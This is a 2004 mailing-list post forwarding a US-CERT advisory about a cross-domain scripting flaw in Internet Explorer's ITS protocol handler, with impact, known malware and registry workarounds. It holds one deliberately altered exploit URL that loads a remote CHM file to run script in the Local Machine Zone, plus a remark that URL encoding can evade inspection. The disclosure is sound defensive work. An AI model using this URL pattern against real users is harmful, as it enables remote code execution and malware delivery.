[thelist] Fwd: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler
Anthony Baratta
anthony at baratta.com
Thu Apr 8 17:36:04 CDT 2004
FYI...
New IE Security Hole - no patch currently available, review the RegHack
explained below. Watch out for HTML formated emails and strange web sites.
Big Note: CERT is saying this might be exploitable via a non-IE browser!!
>From: CERT Advisory <cert-advisory at cert.org>
>To: cert-advisory at cert.org
>Organization: CERT(R) Coordination Center - +1 412-268-7090
>Subject: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability
>in Internet Explorer ITS Protocol Handler
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Vulnerability in Internet Explorer ITS Protocol Handler
>
> Original release date: April 8, 2004
> Last revised: --
> Source: US-CERT
>
>Systems Affected
>
> * Microsoft Windows systems running Internet Explorer
>
>Overview
>
> A cross-domain scripting vulnerability in Microsoft Internet Explorer
> (IE) could allow an attacker to execute arbitrary code with the
> privileges of the user running IE. The attacker could also read and
> manipulate data on web sites in other domains or zones.
>
>I. Description
>
> There is a cross-domain scripting vulnerability in the way ITS
> protocol handlers determine the security domain of an HTML component
> stored in a Compiled HTML Help (CHM) file. The HTML Help system
> "...uses the underlying components of Microsoft Internet Explorer to
> display help content. It supports HTML, ActiveX, Java, [and] scripting
> languages (JScript, and Microsoft Visual Basic Scripting Edition)."
> CHM files use the InfoTech Storage (ITS) format to store components
> such as HTML files, graphic files, and ActiveX objects. IE provides
> several protocol handlers that can access ITS files and individual CHM
> components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
> the ability to access parts of MIME Encapsulation of Aggregate HTML
> Documents (MHTML) using the mhtml: protocol handler.
>
> When IE references an inaccessible or non-existent MHTML file using
> the ITS and mhtml: protocols, the ITS protocol handlers can access a
> CHM file from an alternate source. IE incorrectly treats the CHM file
> as if it were in the same domain as the unavailable MHTML file. Using
> a specially crafted URL, an attacker can cause arbitrary script in a
> CHM file to be executed in a different domain, violating the
> cross-domain security model.
>
> Any programs that use the WebBrowser ActiveX control or the IE HTML
> rendering engine (MSHTML) may be affected by this vulnerability.
> Internet Explorer, Outlook, and Outlook Express are all examples of
> such programs. Any programs, including other web browsers, that use
> the IE protocol handlers (URL monikers) could function as attack
> vectors. Also, due to the way that IE determines MIME types, HTML and
> CHM files may not have the expected file name extensions (.htm/.html
> and .chm respectively).
>
> NOTE: Using an alternate web browser may not mitigate this
> vulnerability. It may be possible for a web browser other than IE on a
> Windows system to invoke IE to handle ITS protocol URLs.
>
> US-CERT is tracking this issue as VU#323070. This reference number
> corresponds to CVE candidate CAN-2004-0380.
>
>II. Impact
>
> By convincing a victim to view an HTML document such as a web page or
> HTML email message, an attacker could execute script in a different
> security domain than the one containing the attacker's document. By
> causing script to be run in the Local Machine Zone, the attacker could
> execute arbitrary code with the privileges of the user running IE. The
> attacker could also read or modify data in other web sites (including
> reading cookies or content and modifying or creating content).
>
> Publicly available exploit code exists for this vulnerability. US-CERT
> has monitored incident reports that indicate that this vulnerability
> is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
> BloodHound.Exploit.6 are some example of malicious code that exploit
> this vulnerability. It is important to note that any arbitrary
> executable payload could be delivered via this vulnerability, and
> different anti-virus vendors may identify malicious code with
> different names.
>
> A malicious web site or email message may contain HTML similar to the
> following:
>
> ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
> oit_chm::exploit_html
>
> (This URL is intentionally modified to avoid detection by
> anti-virus software.)
>
> In this example, HTML and script in exploit.html will be executed in
> the security context of the Local Machine Zone. It is common practice
> for exploit.html to either contain or download an executable payload
> such as a backdoor, trojan horse, virus, bot, or other malicious code.
>
> Note that it is possible to encode a URL in an attempt to bypass HTTP
> content inspection or anti-virus software.
>
>III. Solution
>
> Currently, there is no complete solution for this vulnerability. Until
> a patch is available, consider the workarounds listed below.
> Disable ITS protocol handlers
>
> Disabling ITS protocol handlers appears to prevent exploitation of
> this vulnerability. Delete or rename the following registry keys:
>
> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
> ss,its,mk}
>
> Disabling these protocol handlers will significantly reduce the
> functionality of the Windows Help system and may have other unintended
> consequences. Plan to undo these changes after patches have been
> tested and installed. Follow good Internet security practices
>
> These recommended security practices will help to reduce exposure to
> attacks and mitigate the impact of cross-domain vulnerabilities.
>
> * Disable Active scripting and ActiveX controls
>
> NOTE: Disabling Active scripting and ActiveX controls will not
> prevent the exploitation of this vulnerability.
>
> Disabling Active scripting and ActiveX controls in the Internet
> and Local Machine Zones may stop certain types of attacks and will
> prevent exploitation of different cross-domain vulnerabilities.
>
> Disable Active scripting and ActiveX controls in any zones used to
> read HTML email.
>
> Disabling Active scripting and ActiveX controls in the Local
> Machine Zone will prevent malicious code that requires Active
> scripting and ActiveX controls from running. Changing these
> settings may reduce the functionality of scripts, applets, Windows
> components, or other applications. See Microsoft Knowledge Base
> Article 833633 for detailed information about security settings
> for the Local Machine Zone. Note that Service Pack 2 for Windows
> XP includes these changes.
>
> * Do not follow unsolicited links
>
> Do not click on unsolicited URLs received in email, instant
> messages, web forums, or Internet relay chat (IRC) channels.
>
> * Maintain updated anti-virus software
>
> Anti-virus software with updated virus definitions may identify
> and prevent some exploit attempts. Variations of exploits or
> attack vectors may not be detected. Do not rely solely on
> anti-virus software to defend against this vulnerability. More
> information about viruses and anti-virus vendors is available on
> the US-CERT Computer Virus Resources page.
>
>Appendix B. References
>
> * Vulnerability Note VU#323070 -
> <http://www.kb.cert.org/vuls/id/323070>
>
> * US-CERT Computer Virus Resources -
> <http://www.us-cert.gov/other_sources/viruses.html>
>
> * CVE CAN-2004-0380 -
> <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
>
> * Introduction to URL Security Zones -
> <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
> ew.asp>
>
> * About Cross-Frame Scripting and Security -
> <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
> urity.asp>
>
> * MIME Type Determination in Internet Explorer -
> <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
> pendix_a.asp>
>
> * URL Monikers -
> <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
> p>
>
> * Asynchronous Pluggable Protocols -
> <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
> .asp>
>
> * Microsoft HTML Help 1.4 SDK -
> <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
> rt.asp>
>
> * Microsoft Knowledge Base Article 182569 -
> <http://support.microsoft.com/default.aspx?scid=182569>
>
> * Microsoft Knowledge Base Article 174360 -
> <http://support.microsoft.com/default.aspx?scid=174360>
>
> * Microsoft Knowledge Base Article 833633 -
> <http://support.microsoft.com/default.aspx?scid=833633>
>
> * Windows XP Service Pack 2 Technical Preview -
> <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
> mspx >
>
> * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
> _________________________________________________________________
>
> This vulnerability was reported by Thor Larholm.
> _________________________________________________________________
>
> Feedback can be directed to the author: Art Manion.
> _________________________________________________________________
>
> Copyright 2004 Carnegie Mellon University.
>
> Terms of use:
>
> <http://www.us-cert.gov/legal.html>
>
> Revision History
>
> April 8, 2004: Initial release
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.2.1 (GNU/Linux)
>
>iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
>sWme3VvhRbvk9KjNUNyTsbY=
>=kL0G
>-----END PGP SIGNATURE-----
More information about the thelist
mailing list